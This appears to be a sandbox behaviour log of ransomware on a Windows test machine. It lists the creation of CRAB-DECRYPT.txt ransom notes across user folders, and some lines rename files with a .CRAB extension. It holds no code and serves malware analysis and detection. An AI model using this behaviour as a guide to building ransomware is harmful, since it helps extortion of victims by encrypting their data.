File Create filename = C:\Users\aETAdzjz\Documents\4pk5xz3if\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\4pk5xz3if\iVW0RGHlicG Hzx0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\AxPhQ0mF_FKp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\F-Ym27JZWwd_1ngVaiBV\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Shapes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Shapes\_private\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\OneNote Notebooks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\OneNote Notebooks\My Notebook\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\Outlook Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\tYADVae4csR\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Documents\tYADVae4csR\KPmSm5_Jdwi-FZC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\Microsoft Websites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\MSN Websites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Favorites\Windows Live\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\-hVupXG7m_Cs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\DnJAknvIy7yvnJQJZIo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\DnJAknvIy7yvnJQJZIo\eJX7U\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\DnJAknvIy7yvnJQJZIo\eJX7U\JJPcUbiG7zKAw ZL1d7\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\DnJAknvIy7yvnJQJZIo\qfwMg0ir4m6Yey4\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\ftjIViaL6h\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Music\ftjIViaL6h\V4SwSPqo7BJ8A\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\ntuser.dat.LOG1, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\ntuser.dat.LOG1, destination_filename = C:\Users\aETAdzjz\ntuser.dat.LOG1.CRAB False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf, destination_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.CRAB False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms, destination_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.CRAB False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms, destination_filename = C:\Users\aETAdzjz\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.CRAB False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\ntuser.ini, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\ntuser.ini, destination_filename = C:\Users\aETAdzjz\ntuser.ini.CRAB False 1
Fn
File Create filename = C:\Users\aETAdzjz\OneDrive\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\fScxNAsQ_v\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\fScxNAsQ_v\P1pR0SKdN-Cy8_\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\fScxNAsQ_v\P1pR0SKdN-Cy8_\1CK-5-PYY6hdpu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\nPGhZBMpI\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\nPGhZBMpI\_5dyIJt\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\SkI-vCpKN\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Pictures\Q59pVM4DGorH9C\SkI-vCpKN\xbeZwnNGCfmWAoEC2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Searches\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\Jg-ab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\Jg-ab\3UXeHKbbXw-r\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\Jg-ab\sh0KYzRkmp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\kdvACwNk9kbryTA3pNb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\kdvACwNk9kbryTA3pNb\6qNC7PF6pw8CP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\CrcPLeAZTAb\kdvACwNk9kbryTA3pNb\6qNC7PF6pw8CP\u6Lb6668pv_ePK\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\EJD1E7OJwGrA_\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\EJD1E7OJwGrA_\4udnlrtpCkLpV\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\Videos\NWaecIZZww\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Credentials\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\1NBUR4HR\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\6ASVN7J7\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\D68G7BIJ\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\KQMHSVKD\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Media\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\LocalLow\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\LocalLow\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Contacts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Cookies\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Downloads\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Favorites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Favorites\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Favorites\Microsoft Websites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Favorites\MSN Websites\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Favorites\Windows Live\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Links\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Music\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\My Documents\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\NetHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Pictures\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Searches\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\SendTo\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default\Videos\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Default User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\Public\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
